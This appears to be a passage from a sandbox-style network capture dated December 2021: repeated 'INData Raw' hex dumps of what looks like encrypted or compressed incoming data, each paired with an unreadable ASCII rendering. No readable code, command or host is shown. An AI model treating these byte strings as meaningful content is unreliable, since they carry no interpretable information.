                                                                                                                                                        2021-12-28 02:24:06 UTC3747INData Raw: bb 1e 5f 45 f3 d1 ad 8e 3d cb b3 e8 95 f6 97 2a 50 71 d0 2b 04 ea 8e 16 eb 33 b3 d2 6f 7b 1e 59 16 70 af f4 ad a9 65 08 de c8 83 ff 08 ae df 0d 2e 97 30 da 7d 87 2d bd 7f 93 d1 41 01 d9 8c 50 e0 37 17 1f 2c 65 44 89 09 d3 63 c8 c2 b9 17 be 33 8b 78 d2 de 8a a8 6f b8 0b 2c 28 bd 98 87 31 cb bb 0d 7b 41 26 7d b4 f9 5a 64 e0 c0 86 a5 52 5a 24 30 05 dc 17 1c c0 03 56 91 fa 78 8d 23 06 13 5b da 89 ea 43 10 43 e0 01 cd 58 e1 3f c9 55 e9 e8 e7 52 09 ac 86 b2 9b cd 63 a3 b3 42 45 90 04 d1 9c ee fe fa 68 b5 2b d3 1c da 02 b9 6a 97 cf 1f e8 56 75 8a c1 80 14 89 1d 7d df be a1 d4 8e f1 27 ea f9 24 f6 a2 02 21 92 80 b9 10 1b 72 51 e5 29 8c 51 fc a2 09 30 2e 49 7b 55 8a c6 6e fe d3 9f f2 f2 2a 55 89 8e 5b 09 63 11 e0 fd 78 65 f4 30 04 cf 09 7e 02 82 b6 45 7a 75 ce 31
                                                                                                                                                        Data Ascii: _E=*Pq+3o{Ype.0}-AP7,eDc3xo,(1{A&}ZdRZ$0Vx#[CCX?URcBEh+jVu}'$!rQ)Q0.I{Un*U[cxe0~Ezu1
                                                                                                                                                        2021-12-28 02:24:06 UTC3763INData Raw: c1 f1 28 af 2c 32 39 4e 05 be 89 b1 44 b0 ce db 23 be c5 11 9d 21 27 8c 9f f5 98 44 bb 97 25 4c 34 84 a9 91 2e 0c f6 5d 98 eb b9 6a f7 4c 97 f1 5d 74 b5 7a de a0 e9 31 34 75 fa ef 68 8d a3 1f 54 24 ef 2e cf 6e 63 15 ca bb cf 70 74 7b 09 1f 2b 12 a8 38 ca e7 93 3e 76 fc 26 2d c5 2a ca 06 e3 27 28 c6 51 7e 0c 25 10 7e 17 c5 a0 79 1e 4f 8c 7d 28 5e 4c 8c f1 4d 32 2b 74 b0 ad f9 d8 18 2b 82 8a 7c bc 51 a5 46 90 99 61 56 7b 6d ad ce a8 88 4f 4b 0e 2b df 9b c5 19 b3 6d 73 ba 39 4d 5b ad 11 b2 13 99 ca a4 93 d6 d4 60 cf 59 59 e7 d1 fc c7 4a a1 f0 43 b7 07 98 d1 bc ec 90 c9 5a 29 2a 7a 8d d5 c6 16 28 b1 bb c4 ef f9 61 2b ca fd a5 d3 4d 3e 15 0a 25 08 b1 86 0e ee 28 10 70 9a 01 1d 5b 8d 03 1e ae 1e ee 98 1b 87 cb bb 34 1b be b9 16 6d 2f f8 a0 db a4 99 1a 66 46 47
                                                                                                                                                        Data Ascii: (,29ND#!'D%L4.]jL]tz14uhT$.ncpt{+8>v&-*'(Q~%~yO}(^LM2+t+|QFaV{mOK+ms9M[`YYJCZ)*z(a+M>%(p[4m/fFG
                                                                                                                                                        2021-12-28 02:24:06 UTC3779INData Raw: 0e 25 92 b8 da f0 91 b6 e1 9d 7d ca ac d7 a6 5d d8 b9 2a 9f 0b 43 5e f5 20 44 c5 91 33 13 74 db 63 f8 39 ae 1a 06 4f 07 bd 43 e7 4d 05 38 c2 69 00 a1 5e ce 9d cd 0e 71 e8 81 3f 81 14 41 39 8e b2 f6 1f a7 97 ff 23 91 6e d9 a3 3b 75 79 3c f5 e8 6b da 07 bb cb da d4 d1 f0 99 e0 4f 72 9f 87 3a a3 48 fd ef f5 d3 1d b7 89 43 3a 34 d8 fd 4e 6c 46 17 b0 c1 99 ec 9b 28 e9 7b 7a 26 3e d7 24 1c 6e 89 7b fd f7 c9 cc ad 76 8f 7d 18 da 53 21 31 12 89 a8 9e de 08 8a c0 ba b3 81 54 90 75 8e 8e be 03 2d fd 13 0a 73 28 53 a1 28 14 3c 51 d9 22 5b 67 45 74 72 ad 35 14 2f f2 94 a5 f2 00 b5 1b ee 01 d3 32 4f fb e3 35 3f 2b 32 f9 a9 f4 27 9b b0 3f 28 a9 b1 18 df 57 90 e2 09 05 79 54 13 f2 88 68 10 52 3c 56 d2 4f 17 b8 77 c4 db 6c f6 48 6c d0 11 1b 08 a8 ef 7e a3 ac c9 91 5e 9b
                                                                                                                                                        Data Ascii: %}]*C^ D3tc9OCM8i^q?A9#n;uy<kOr:HC:4NlF({z&>$n{v}S!1Tu-s(S(<Q"[gEtr5/2O5?+2'?(WyThR<VOwlHl~^
                                                                                                                                                        2021-12-28 02:24:06 UTC3795INData Raw: 54 e3 44 e5 65 df 89 20 ce b6 a8 f6 d0 a6 64 78 0b 1b 9a c5 ff 12 21 34 d5 fd a4 2a 55 97 3c 4e bd 70 f9 49 4d ef 03 4a 8d 96 e1 74 6b 03 9f 42 26 1a 80 f6 6c 4b 00 db cf f7 df ce 3d 73 18 cf 48 cd c5 a5 5a 60 ef d4 7e a6 8d 68 2b 36 64 de 76 16 5a 62 4c ae 04 b1 e8 9b 8a 15 7b e6 d7 d0 65 5f 4f 75 0a 4f a4 8e 90 5b cf 4a 81 17 68 00 0e 61 a7 83 d9 dc 51 e6 8d d8 c4 1a bc b1 3c 15 61 51 83 ce de 3a 39 84 1a 68 a7 11 9e 54 db af 53 78 a1 ee 60 eb e9 2d c3 ae f0 90 7a de 55 82 09 21 28 c6 28 61 e6 44 29 05 5b c5 f8 6a db 36 07 41 65 2c ef 82 80 10 86 9a c4 ca eb be 04 8e 2a f2 41 52 c8 4d 0b bc 75 12 83 52 86 79 09 ab db 9b 3c 78 4a 82 50 3a 8e b3 d2 aa 19 1c a9 c1 54 d6 f0 ff 52 a7 42 6d 6a 75 db e3 35 cf f8 84 48 6c f8 39 84 35 d3 d8 76 c5 a2 bf 7e 35 e2
                                                                                                                                                        Data Ascii: TDe dx!4*U<NpIMJtkB&lK=sHZ`~h+6dvZbL{e_OuO[JhaQ<aQ:9hTSx`-zU!((aD)[j6Ae,*ARMuRy<xJP:TRBmju5Hl95v~5
                                                                                                                                                        2021-12-28 02:24:06 UTC3811INData Raw: 5a e2 13 82 40 05 50 a6 93 4a 23 79 83 30 5e 7b 94 3c c7 af 78 1f 80 40 1a 28 fb 84 26 3e e9 16 19 1d 47 f8 5f a5 9a 1f 26 6c 3d 09 31 d4 3c 0b f2 56 e4 23 18 50 48 a8 9f c5 db 41 29 dc 8f 21 6a dd 8c be 7f 42 59 70 a3 7d e3 4c 6e 5e 9f 8c e7 74 39 3a 0e c3 99 d7 37 2d 98 17 69 bb 87 34 f2 43 e2 e9 a3 25 1f 30 5a 1b 4b ed 52 b4 58 4d 85 48 3a 93 27 40 97 2b dd 3b 76 f5 bc 46 3a b2 11 22 9a 21 8b 65 4c 15 7d 18 e0 d3 bc de 99 7f 17 69 c3 97 9c 05 5e 52 0d e8 b9 51 1f 07 90 3e 2f a4 85 71 07 6e 22 cb 9a 91 53 ac ff 3b a7 ab 9e 68 94 32 36 14 d0 58 45 72 43 ae ee f2 e1 14 35 53 d1 c7 f2 84 74 fe 5b 84 ff be 82 24 60 35 5c 63 6f 76 cf b3 31 da 8d ec e4 e3 ff 82 a5 84 75 0a 1a 19 7d e4 11 dd 1c d8 b9 1f f4 32 f7 04 e4 f6 08 76 74 9b fd bb 97 14 23 58 17 c5 5f
                                                                                                                                                        Data Ascii: Z@PJ#y0^{<x@(&>G_&l=1<V#PHA)!jBYp}Ln^t9:7-i4C%0ZKRXMH:'@+;vF:"!eL}i^RQ>/qn"S;h26XErC5St[$`5\cov1u}2vt#X_
                                                                                                                                                        2021-12-28 02:24:06 UTC3827INData Raw: c6 43 42 d2 be 3f 5a 01 2d 56 0d 97 49 0e 57 0d 43 db c6 67 ab 47 0e 6c b7 97 22 00 30 4e 50 b4 17 1d d4 de fc b7 0e 8b 3a 08 38 33 6d d6 2f 1f 9a c2 8a af ba 2a d7 7a 57 4e 0d 02 e6 3f af af 0b d1 f8 f0 3c 17 9d ea d9 b3 5f 9d f6 ef e0 38 88 03 d9 33 3b 24 bb 62 4f ac d6 52 98 38 a0 f7 97 7c 02 2b 32 88 78 68 a5 1e cd ed ee ee 48 a7 f3 3b 6d 8e 39 24 31 e1 98 d2 c4 74 38 2b a4 f5 de 6b 5f 19 78 f5 b5 b9 f7 a5 11 ec 1a 81 a4 29 9b a3 95 ea d4 d6 b2 49 d9 58 e8 81 15 88 65 98 3c 6d b6 46 f7 04 93 11 74 1e 0c d7 48 fa cc 11 1c fa 4e 14 a5 1f d3 12 05 f8 a3 58 3a e2 bb d4 c3 ff 22 41 68 79 f0 78 1e c8 bb 01 02 bf 6b ad c9 c6 eb 21 78 60 ba 63 49 5e 6e 5b 23 0e 4d 4c 94 bc c1 a2 55 88 40 e9 e4 8a 38 9c ab 36 00 9b 2c f8 88 7d 5b 74 9e 2d 5b 20 b3 b8 d2 51 a0
                                                                                                                                                        Data Ascii: CB?Z-VIWCgGl"0NP:83m/*zWN?<_83;$bOR8|+2xhH;m9$1t8+k_x)IXe<mFtHNX:"Ahyxk!x`cI^n[#MLU@86,}[t-[ Q
                                                                                                                                                        2021-12-28 02:24:06 UTC3843INData Raw: 1c a4 41 15 b3 c5 fd bd d7 ff 71 08 47 18 4b af 51 59 8e 88 f6 9b f9 d2 2f 6b d4 2f 9b 2c 25 3d 92 af 18 04 24 49 ee 95 5b b1 14 85 43 2b 54 c8 e5 9a c8 64 ab 04 2d f5 60 1f 35 07 94 95 64 38 41 a1 b1 28 01 3b ed 8c ad 11 78 70 6f 52 fc 55 8e 78 ab b6 f0 02 2d f6 b3 e1 1d ac 9b 25 25 20 8a 52 01 69 17 e5 7f 67 5e 36 9d ba 4b e2 39 2d a1 44 5d 5d d1 b0 92 95 eb 08 56 fa c2 af 5d b1 27 66 b0 07 4e 71 ea a2 ba ed f3 80 71 bc 66 a2 a2 b5 54 71 c3 bd cb 21 57 ab 0e e9 bd 83 92 9e 78 ef 78 b1 b3 d6 85 ee c6 96 8a 07 72 69 0d e6 c1 12 0c 93 c3 3e 63 8b 50 97 92 7b 17 4d 08 da 05 19 8a bb f1 bf 4d bb e6 a7 f6 1b 11 2b 6b 9d 91 23 e2 72 c0 1b b1 c5 57 f7 aa d3 27 2e bc f7 6d 7f cd 6b e4 e6 d3 ea 0f e3 5b 30 2a 41 c7 b9 b2 29 6f 33 9c 41 06 75 4a 57 ec c5 54 8c 65
                                                                                                                                                        Data Ascii: AqGKQY/k/,%=$I[C+Td-`5d8A(;xpoRUx-%% Rig^6K9-D]]V]'fNqqfTq!Wxxri>cP{MM+k#rW'.mk[0*A)o3AuJWTe
                                                                                                                                                        2021-12-28 02:24:06 UTC3859INData Raw: 5e 8e fd 2c 25 41 bd 51 77 c2 74 a6 97 c1 e3 f5 8b 58 fa 43 d5 2f b0 2c 6f 33 ac e8 49 9e 4a d6 cd fb 32 0b 45 3d f3 79 fc 51 8d 38 25 a4 b7 0b 75 82 48 d5 56 1b 62 12 36 eb 72 36 48 48 39 26 b1 3c df 36 05 5e 0f 43 b9 d7 01 8b 06 a6 26 f9 9a 17 77 57 66 f6 28 c5 d7 60 df 12 da 39 24 57 3c 37 4a f2 4a 9c 4d 44 44 f0 15 43 87 6c ab 02 bd 5d bd 1f 91 c6 a0 2e b8 a5 d3 57 4c 57 00 e6 e1 84 92 61 4a 37 4b 9d d3 08 c1 e9 a4 7f d3 f4 0c 00 11 97 c5 de f0 07 1f d0 91 e6 48 64 92 65 e9 47 22 f9 73 63 e3 ba 9c ab 7e be 60 49 f9 41 24 3f 32 60 d3 9e 44 bb 92 b8 e4 9b a9 e3 0b 37 08 5e 09 65 83 ba 53 7b 58 c6 41 7a 8a d3 70 7f d1 37 24 99 66 a0 22 91 be e2 0c 23 ed 83 1a cf 40 c7 1e 5a f4 2a 60 ba 2f c2 d6 02 5e 89 ef b3 b0 cd 44 be d7 b0 8c 8f 1c 8f a8 bf cb c7 82
                                                                                                                                                        Data Ascii: ^,%AQwtXC/,o3IJ2E=yQ8%uHVb6r6HH9&<6^C&wWf(`9$W<7JJMDDCl].WLWaJ7KHdeG"sc~`IA$?2`D7^eS{XAzp7$f"#@Z*`/^D
                                                                                                                                                        2021-12-28 02:24:06 UTC3875INData Raw: fc ba ea af c8 36 ad ab 6a 8f 69 0e a9 ba 9e 41 88 82 fc c2 f8 dc ee 44 56 ae 60 37 f3 8e 09 b2 ca ba e8 31 30 25 b3 15 c2 2f a8 90 96 76 7d ac 35 fc db 0e ea ae bf 41 6b f3 08 19 75 85 26 51 2b 9c 25 25 2f a7 4d dd ed f4 4f 07 d0 e7 dd 96 32 16 ff dc 10 36 79 b3 5f 83 58 02 df c9 66 ed 77 f5 66 ae 15 ef 87 ee cc 11 a4 da 3b 10 da ab ef 9b 11 9d 88 e5 77 96 55 5e 71 20 cd aa 77 8f d3 1b 30 14 7e d8 17 97 1a b6 1e 2f 88 1b 2f 71 9c dd 31 c2 b8 07 b2 6b d2 8b 06 09 8f 7f 39 9f f1 87 48 b5 0f 68 0e 2a 9e 3e b2 77 b9 ee d5 e1 f1 74 bb 65 36 c9 ed 87 b4 f9 b7 fb 7a 4e b9 fc 35 ad 02 4a f8 4a 1c a1 d9 44 99 2b ec f8 91 0e aa ea 7c 60 9a ab a2 61 6b 41 84 0a 68 28 4d 88 e8 3b cb e6 b7 b0 45 2b c3 6e 90 c8 6d c0 09 b3 09 8f 40 f7 9e 72 51 d4 9a 79 ce 71 0a be e3
                                                                                                                                                        Data Ascii: 6jiADV`710%/v}5Aku&Q+%%/MO26y_Xfwf;wU^q w0~//q1k9Hh*>wte6zN5JJD+|`akAh(M;E+nm@rQyq
                                                                                                                                                        2021-12-28 02:24:06 UTC3891INData Raw: 51 76 98 df e9 fd 94 a3 ff 1e b8 1d b4 1b df 57 93 d8 df bf 83 9f 5b 91 c4 89 3c 2a 4a d9 46 e4 53 2a 4d 16 e1 42 75 62 b7 45 9d 98 5d 2f 87 0d ab 5a 94 e8 53 48 37 49 06 16 83 0b 45 0d 77 89 25 7c 0b a0 d4 a4 de ed b7 c1 e4 a7 dc aa bd c9 2f e2 85 6a 2a e6 4f db 5c cc 7f 15 1e 0f 89 fd 49 f8 5b 29 bf 41 92 55 7d c6 16 ac 70 8d a6 cb 2b 63 d0 09 1d 1d 25 33 02 be 6e a9 5f f2 5b e2 b1 3b 3f 4c a0 17 57 f3 01 fb 15 43 94 08 4a db 0e 4d 20 4c 8c ad 73 c3 18 ac e5 55 bb fe 3c da e8 87 b2 7d 78 99 0e 5b 46 80 63 1c 93 e2 09 d6 0a ca d9 df 00 5e ab 61 35 0a 1b 77 b8 c9 50 67 6c d4 8e 3d a6 bf 0b ab 4f 7b ba db 57 b3 4f 0e 0c 8d 22 4b 12 4d 86 c2 52 15 f9 00 90 a1 26 6d c6 b4 94 3d 09 91 39 e0 d9 84 b7 4c 36 0d f4 44 98 88 71 93 bf 33 67 81 fa 2b 35 1c a1 ea 60
                                                                                                                                                        Data Ascii: QvW[<*JFS*MBubE]/ZSH7IEw%|/j*O\I[)AU}p+c%3n_[;?LWCJM LsU<}x[Fc^a5wPgl=O{WO"KMR&m=9L6Dq3g+5`
                                                                                                                                                        2021-12-28 02:24:06 UTC3907INData Raw: bf 6f 2b f9 f1 08 aa 00 50 9f b5 b0 18 db 33 f6 83 0b 3e 42 81 3a 02 ca 06 7c 34 2c 13 5b 5f 57 48 f6 86 bc e9 42 0a 3a ee ca 88 72 4d 73 a5 4f cf 3f 97 91 7c 16 c2 be d5 9b a8 4a 5b bf 07 fd 19 44 e4 53 9e 6e 3a cc 09 bb 3d 59 b5 8d 5b bf 16 a5 8c 69 2f 6a 52 51 e5 2d 2f 0b 8b 6e 26 a4 b0 86 55 9d 41 64 16 0b 6b 84 86 73 06 60 aa 0c 5a d5 af eb 2b 5b e6 22 9a a6 f0 35 25 d6 30 ba 78 67 f2 5b 2d 75 bd 79 1a bd 11 a9 e0 36 d6 2b 32 8c 55 cc f2 55 ff 15 2f 79 d1 a5 57 b6 b6 15 43 0b 55 09 65 7c e2 12 5e aa 43 d0 a0 1e dc 0d 6c cd fe ae 80 ad db 80 53 4e b6 81 76 b2 a8 d5 e1 9d 30 b1 bf 05 95 56 e0 f9 bb 21 4c 2e 2a 7d f4 bb 59 82 dd f0 1a bf fc 14 6e 11 b8 f8 ce b0 b2 a4 86 c4 e0 79 a6 5b d8 55 ad 2f 06 23 3e 81 b7 bf e7 dd d5 d4 00 df 94 b3 5b 56 57 2f 96
                                                                                                                                                        Data Ascii: o+P3>B:|4,[_WHB:rMsO?|J[DSn:=Y[i/jRQ-/n&UAdks`Z+["5%0xg[-uy6+2UU/yWCUe|^ClSNv0V!L.*}Yny[U/#>[VW/
                                                                                                                                                        2021-12-28 02:24:06 UTC3923INData Raw: 31 f3 dc 29 e4 b6 81 ec cd af 63 dd b5 2e 71 8b 16 ef 09 39 47 f8 17 ba c8 e5 55 23 d8 06 5d d5 8d 00 51 d7 a7 40 5f ad d1 53 7f a9 c0 a7 b3 0f 08 a4 83 f0 01 c9 18 e0 19 66 be 03 90 c9 66 e3 06 da 25 9f 51 35 93 72 1d f1 3b f9 65 44 07 1f 80 e1 cc 2c 8e 53 ef ac 60 89 4d ae 30 5d fa e9 2f d6 51 9c 25 ef fe 9e 43 3b eb de d4 0b 0c 5c a7 43 45 9a 70 2e 69 99 b6 83 77 17 09 8e 2a 1b e1 f8 56 38 12 2f 6c ee f4 cb 2e 09 91 57 d5 0e 42 e1 d2 2a 6b 67 3a 42 04 9c 65 c0 40 ba 22 47 54 75 06 e4 65 f9 8a 98 73 50 89 e3 ad 3d db 12 d9 f6 9f 0a 56 cc 83 56 21 cd 63 a6 5e ea b5 aa e6 1b ed ca 3d af 01 3b 9b 46 36 cf ce 28 16 35 d9 52 d4 53 9b b0 20 92 44 b8 96 9c 4c 5f 9e dc 53 b8 f3 89 c1 4b c8 9c cb e4 71 1d 17 af f2 58 ea 28 82 c6 cd fb 0f 5e e0 4f 5f de 7c 51 00
                                                                                                                                                        Data Ascii: 1)c.q9GU#]Q@_Sff%Q5r;eD,S`M0]/Q%C;\CEp.iw*V8/l.WB*kg:Be@"GTuesP=VV!c^=;F6(5RS DL_SKqX(^O_|Q
                                                                                                                                                        2021-12-28 02:24:06 UTC3939INData Raw: 44 7c ce 7f 42 43 9b a8 3f b0 26 40 dd 93 70 cd c9 40 e1 ed b7 ab c5 ff 69 39 b3 4c 46 e8 64 10 7a 02 e8 c9 b8 54 1d 2e 84 fb ad d2 95 fa 5d a1 32 63 bb e3 a5 23 10 3f 27 5b fe 55 3d 7b b8 a4 58 11 d2 61 b9 cc d1 cf 34 aa 69 c5 42 67 37 dc b1 f8 52 bd 7a d6 d1 fd ef f9 c8 e5 b4 5b 19 1e a9 06 7b a5 41 59 f8 bc 73 e6 99 68 39 25 84 67 9f 9d 35 00 88 3f eb 5d 1f 43 60 48 c7 39 b1 83 3a 1c fe fd 36 97 70 c0 85 75 19 a9 b4 e6 48 bb 0f e9 92 b2 42 60 41 03 d1 91 f8 01 6c c6 75 c2 57 89 06 7f 8b 73 22 68 10 78 3e 6b 42 f5 e2 9e ac af d2 d0 16 62 a9 27 d7 da 89 f4 3d 27 00 2e a9 5c ad 1f 9d fe dc a1 19 0f da 5f cc 62 45 42 fc db d2 1d 8e 06 21 da 5b ac ce 10 53 47 aa 79 e0 80 a0 56 c8 09 c0 53 29 e5 c1 23 74 9a 61 04 02 17 ae a8 1a 28 6a 6d e2 53 0e 1e 14 d6 da
                                                                                                                                                        Data Ascii: D|BC?&@p@i9LFdzT.]2c#?'[U={Xa4iBg7Rz[{AYsh9%g5?]C`H9:6puHB`AluWs"hx>kBb'='.\_bEB![SGyVS)#ta(jmS
                                                                                                                                                        2021-12-28 02:24:06 UTC3955INData Raw: d4 5c 4a 10 d9 8e 43 58 d9 34 cb 0a a8 6b bd 63 80 c8 00 8c db 12 37 6d a5 0a 95 25 01 ab 95 62 64 b0 95 45 22 16 d2 46 a0 9c cf 29 aa f3 f9 9f 97 2e 5b 3d 2a af 59 5d f7 fa f5 a6 db a8 a5 c3 81 c8 c2 94 3d 4b ca 04 8b 14 7e 0d ed f8 3c c5 bf ee 0f 14 8b 13 06 9f 07 47 f9 d5 ae 46 2f fb d2 d0 71 b5 3a c8 aa d6 e0 fc ad c3 dd 88 fa 00 13 7e e5 b5 cb 4a c5 09 98 a1 b3 06 d1 21 6a ab d4 1a ab 3b ca c0 dc 94 0a 4e 18 0a b0 cd 01 85 f7 94 ee 13 6b c4 0f 04 cb f0 57 ce 0f fc 14 96 00 34 c9 95 ca df 4c 84 f7 cc 6a 33 c1 31 eb c3 b9 5c 78 fd a1 d7 f6 2f b8 a4 d9 4a 9c 68 8e 40 e4 f9 c7 e0 79 a4 22 98 71 0b 18 b1 3e 0f 93 ed 5b 67 93 e0 81 a7 1b 76 ea b8 17 89 01 9f 72 5b d8 3f be f7 0a 66 fe 31 80 91 cf 0e 6f 08 3c 14 92 76 23 c9 31 6e a5 c4 e9 48 66 93 5d 10 74
                                                                                                                                                        Data Ascii: \JCX4kc7m%bdE"F).[=*Y]=K~<GF/q:~J!j;NkW4Lj31\x/Jh@y"q>[gvr[?f1o<v#1nHf]t
                                                                                                                                                        2021-12-28 02:24:06 UTC3971INData Raw: 95 d4 d9 34 3c fb d1 69 30 76 a0 c3 f2 33 75 c5 0d 0b e5 2e 4e d2 45 73 46 7e 47 49 a0 61 47 78 4e d8 be e7 64 8e 08 36 56 f3 21 67 96 b5 06 83 af f7 2d bc 8b d6 27 f5 c1 12 3c 26 c8 a9 2b 32 f8 7a 3c 94 de 59 18 69 78 a7 ab ee ef 08 9c 90 5b ff 69 af 7f d4 7b c2 43 7d df b6 60 44 39 fa 3f 20 9d 20 6f e2 6a c7 c6 d6 8c e7 5e 4a 57 28 33 eb af d5 85 ef d4 ab c2 47 90 32 41 b1 12 54 2f 93 6e 22 bf 82 5d 6b 24 8e 94 76 71 28 bc 6f 8a 91 43 6f 88 3c a5 22 b5 6a f7 97 54 02 ed 91 f2 08 e7 d1 de fc 5f 82 0a 50 92 b9 37 92 50 a2 88 68 88 e4 45 15 76 d0 04 37 06 47 e3 d2 9c c3 04 99 f5 94 5d 82 28 0a b4 53 53 47 ab 2b 74 05 e8 a8 d6 9e 44 5d 48 5d 83 6d d8 43 91 d7 1b fe e8 fa 42 9d 34 23 f5 bd 8c f2 5d ab a0 86 20 bb 58 ab 44 3a 5a cf d8 12 d9 f4 d8 86 d2 bc d8
                                                                                                                                                        Data Ascii: 4<i0v3u.NEsF~GIaGxNd6V!g-'<&+2z<Yix[i{C}`D9? oj^JW(3G2AT/n"]k$vq(oCo<"jT_P7PhEv7G](SSG+tD]H]mCB4#] XD:Z
                                                                                                                                                        2021-12-28 02:24:06 UTC3987INData Raw: 06 ec 30 fd c2 53 35 f4 0c da 4f 38 b4 12 07 44 76 1c 8f ce b1 e4 bb 94 2e 27 64 92 b0 0f 1a 09 0e a0 82 d7 ad 25 eb 09 09 0c 16 86 98 92 da b3 43 79 b5 37 1f 8a 3c 8f 77 6f 9c 68 c2 a1 20 6e 05 a4 e6 91 13 69 d4 d2 e0 c6 6f 66 b3 71 e7 82 12 8f 99 e8 24 eb 0d 7f c5 dc a5 5b 3a 39 db 02 42 f4 94 bf 51 d1 1e 38 d8 74 84 a0 c1 4a 26 66 da 25 77 2b c0 69 2d d4 89 23 11 14 55 3e d2 7e 74 fe 8f d4 d9 a6 dc c8 6f ed 07 d6 dd b5 6e 22 d3 b4 14 11 df ca 67 d7 05 0e 68 04 b5 e9 98 2e 83 89 87 01 fd 1e ae c4 f8 70 be 0c 98 86 b0 0a 9c fc d5 4d 6f 01 56 37 c6 24 7c 93 a5 23 3b 74 b0 ce f8 2d 53 57 82 6d b8 de 48 3f c0 99 9f b6 ae dd 8e 76 e4 ea b0 f2 87 6b 25 ac b5 55 67 0a 6a c9 aa 2b 2d 15 a7 d1 fe 3a 66 c4 3c 99 79 f1 d1 65 bf 26 09 d1 75 ce 56 ad 01 2f 2e 0f 66
                                                                                                                                                        Data Ascii: 0S5O8Dv.'d%Cy7<woh niofq$[:9BQ8tJ&f%w+i-#U>~ton"gh.pMoV7$|#;t-SWmH?vk%Ugj+-:f<ye&uV/.f
                                                                                                                                                        2021-12-28 02:24:06 UTC4003INData Raw: 54 0e 33 bf 01 1a 6b 19 33 e4 f3 c1 51 50 26 f6 34 b3 80 55 e0 30 fe c8 7b da 49 27 38 fa 5f 7d 0e 41 6a ea c7 a2 6a 43 e6 46 af c8 e6 19 70 10 60 8a 1a 23 b6 d5 ee 1a 9d ec 12 b8 ff f3 8d 45 33 74 a8 c4 13 23 95 34 35 83 f1 f1 18 96 98 74 e5 d6 3c 6c 73 e9 ff 99 12 98 c1 f5 37 ec 20 6c fe 78 61 20 96 c1 96 c0 67 c4 e9 35 86 e2 87 07 01 eb 96 53 e8 2d b9 6e 1d a1 4b 69 43 8b ad 16 5c 5d e9 54 34 fe ff ed 17 72 fc 56 42 32 25 3d fe 8c 38 a0 56 a3 e1 87 87 d6 bd 90 a2 90 12 0e d1 06 98 9c 9d d9 8f ba 9e a7 31 0f 54 79 df 7c 67 84 1b f2 7a ac 7c 1a 6e 55 8d fa b4 66 41 c3 ac ba ac ac 0d 3b b7 3b 47 71 4d 84 d9 50 06 b8 76 f7 05 a5 34 48 6b f3 31 9a 06 42 9d 54 e9 c2 45 c4 76 67 81 06 97 e9 d7 0c d7 eb 14 bf ad 51 50 b3 40 ad 41 4f eb bc ac 94 d8 f9 ab cf 71
                                                                                                                                                        Data Ascii: T3k3QP&4U0{I'8_}AjjCFp`#E3t#45t<ls7 lxa g5S-nKiC\]T4rVB2%=8V1Ty|gz|nUfA;;GqMPv4Hk1BTEvgQP@AOq
                                                                                                                                                        2021-12-28 02:24:06 UTC4019INData Raw: 29 6e 6c 3b ac 6b 9b f9 76 bd 12 1b be 91 c7 18 af 7f bf 93 ac c3 cf 17 2a 43 03 8f be 8a a7 2d e5 ad 4f fc 54 ef ac 5a 4a 08 f0 9b f7 d3 ff 96 9d 61 ae e7 7a 35 95 19 52 d5 78 f5 df 24 c1 a0 6c 9a 0c 2f b9 03 6c a8 d0 b3 90 ec 0b 30 98 52 24 69 55 64 4c ed 01 3e c5 e2 70 aa a6 0e 5e a0 06 d2 cf 20 1b 6b a7 47 bb 37 55 32 05 cb a2 ec 7f 84 fd c4 81 a8 8b 46 1f 50 db b7 ec b5 e0 99 3b 8d 60 c6 96 a3 50 4f 34 7b c4 24 d2 dd 0a 2a d3 66 75 8b 9e 13 c2 76 9c cf 01 83 a2 93 a5 d7 3d a0 87 c2 9c 90 94 d4 fb 7d 0a d9 80 7e e4 6c ca 6d 8b 5a bf 93 9f fc 78 5e a2 1a a0 ba bc 3c e4 94 95 0c 2e dd f6 21 85 5c 24 15 ae 00 51 dd 2c b8 40 cb e4 3c 53 9b 45 1c 3e ec d5 1b 17 c1 44 3d 0f ee 40 69 1d 53 6f 02 6e 2b 79 b1 ba 38 04 6f 9f dd 7b 5a f2 b9 dd 60 8f 25 69 66 43
                                                                                                                                                        Data Ascii: )nl;kv*C-OTZJaz5Rx$l/l0R$iUdL>p^ kG7U2FP;`PO4{$*fuv=}~lmZx^<.!\$Q,@<SE>D=@iSon+y8o{Z`%ifC
                                                                                                                                                        2021-12-28 02:24:06 UTC4035INData Raw: 75 cb ea f6 b3 20 d9 19 b1 91 17 f9 ff 3f 38 5e 5b 04 41 0b 6b 65 41 6a ca 35 b4 7f f7 38 43 33 28 b9 da 17 94 fc 58 76 25 5b 3a 3f 03 33 4c 06 48 97 03 04 98 94 23 5e 92 46 94 dd 2f ab a2 a4 9e 79 ef d2 5f 2c 27 bb ad 11 0f 21 d4 4d 6b 27 24 fc c3 33 71 78 6f c1 5f 56 88 88 1e ee 84 d5 4f 6a 52 e2 c8 e8 30 46 91 07 8f b7 d0 46 fc 96 1f af 72 7c 20 ba 38 d7 6d 98 c2 ae 3b ab c1 98 d6 43 ac 37 5d 27 6b 4b eb ff 4c 23 91 c8 da d4 dd a5 e1 0d 76 f3 71 30 7b f3 87 1f da 8f 18 88 e3 92 d7 aa e3 b4 de 73 e2 38 be c9 71 05 d0 bf 12 0a 56 b5 f4 22 55 2d 16 47 be 7f 70 60 7a 0c 14 7e 2d b9 52 19 c9 d9 52 6a 7f 26 55 8f 74 ab 9f 8d fd da 41 4f b6 05 5b 7c 40 a9 b5 aa 3a 0e f4 99 45 6d c4 a0 57 f5 fb 2c 46 58 c9 13 33 94 22 c5 dd 27 0c ce 73 a9 9c 0d 9c eb b2 6e 75
                                                                                                                                                        Data Ascii: u ?8^[AkeAj58C3(Xv%[:?3LH#^F/y_,'!Mk'$3qxo_VOjR0FFr| 8m;C7]'kKL#vq0{s8qV"U-Gp`z~-RRj&UtAO[|@:EmW,FX3"'snu
